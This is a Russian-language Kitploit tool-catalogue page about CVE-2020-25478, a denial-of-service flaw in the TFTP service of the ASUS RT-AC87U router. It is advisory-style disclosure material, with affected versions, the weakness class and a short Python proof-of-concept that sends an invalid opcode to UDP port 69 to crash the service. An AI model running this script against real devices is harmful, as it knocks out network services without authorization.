Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack — ASUS RT-AC87U TFTP уязвим для атаки типа «Отказ в обслуживании» (DoS) | Kitploit
Инструменты/GitHubGitHub/santokum/cve-2020-25478--asus-rt-ac87u-tftp-is-vulnerable-to-denial-of-service-dos-attack
Анализ уязвимостейЭксплуатацияФаззингБезопасность оборудования и IoT
GitHubsantokum/cve-2020-25478--asus-rt-ac87u-tftp-is-vulnerable-to-denial-of-service-dos-attack

CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack

ASUS RT-AC87U TFTP уязвим для атаки типа «Отказ в обслуживании» (DoS)

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
3 лет назадЕщё не проверено

ASUS-RT-AC87U TFTP уязвим для атаки «Отказ в обслуживании» (DoS)

CVE-2020-25478 - ASUS RT-AC87U TFTP уязвим для атаки типа «Отказ в обслуживании» (DoS)

  1. НАЗВАНИЕ ЗАТРАГИВАЕМЫХ ПРОДУКТОВ И ВЕРСИЙ

ASUS RT-AC87U 3.0.0.4.382_51640

  1. ТИП ПРОБЛЕМЫ

В первую очередь это связано с CWE-20: служба TFTP, работающая на ASUS RT-AC87U, уязвима для атаки типа «Отказ в обслуживании» (DoS) при отправке службе недопустимого опкода. Для проверки уязвимости используется следующий фрагмент кода на Python:

root@kitploit:~
	import socket
	import sys
	tftpd = ('192.168.1.1', 69)
	#Try and open an UDP SOCKET
	try:
	tftp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	except:
	print("Failed on socket creation, so exiting")
	sys.exit(1)
	#create a invalid opcode exeeding the 2 byte length
	# opcode operation
	# 1 Read request (RRQ)
	# 2 Write request (WRQ)
	# 3 Data (DATA)
	# 4 Acknowledgment (ACK)
	# 5 Error (ERROR)
	invalidOpcode = "0000"
	tftp.sendto(invalidOpcode,tftpd)

3. ОПИСАНИЕ

ASUS RT-AC87U версии 3.0.0.4.382_51640 уязвим для атаки типа «Отказ в обслуживании» на службу TFTP, что приводит к сбою службы TFTP. Служба TFTP может быть удалённо выведена из строя отправкой недопустимого опкода.

https://www.asus.com/content/ASUS-Product-Security-Advisory/

Скачать инструмент